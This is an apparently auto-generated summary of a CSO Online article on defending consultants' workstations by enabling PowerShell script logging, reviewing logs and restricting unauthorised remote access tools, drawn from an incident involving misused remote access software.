How to log and monitor PowerShell activity for suspicious scripts and commands

Source: How to log and monitor PowerShell activity for suspicious scripts and commands | CSO Online

Author: unknown

URL: https://www.csoonline.com/article/4006326/how-to-log-and-monitor-powershell-activity-for-suspicious-scripts-and-commands.html

ONE SENTENCE SUMMARY:

Attackers exploit consultants’ systems using legitimate tools and remote access methods, highlighting the need for enhanced workstation protection strategies.

MAIN POINTS:

1. Consultants’ computers are attractive targets due to their access across multiple organizations.
2. Recent attack involved installing Alpha Agent and updating Splashtop for remote access.
3. Attackers employed legitimate tools and normal processes, avoiding antivirus detection.
4. Entry point of the initial attack remains unknown.
5. Adjust attack surface reduction rules to prevent common attack techniques.
6. Enable PowerShell script logging via Group Policy or Intune for monitoring.
7. Regularly review logs for suspicious scripts, encoding, and obfuscation techniques.
8. Microsoft Defender for Cloud can detect suspicious PowerShell and script activities.
9. Maintain awareness of authorized remote access tools and restrict unauthorized ones.
10. Monitor consultant workstations closely to detect abnormal activities quickly.

TAKEAWAYS:

1. Tighten security rules to block execution of potentially malicious scripts.
2. Enable detailed PowerShell logging on all critical workstations.
3. Regularly analyze logs for unusual activities or attempts to harvest credentials.
4. Clearly document approved remote access tools and restrict unauthorized installations.
5. Increase monitoring and alerts specifically on consultant machines accessing internal resources.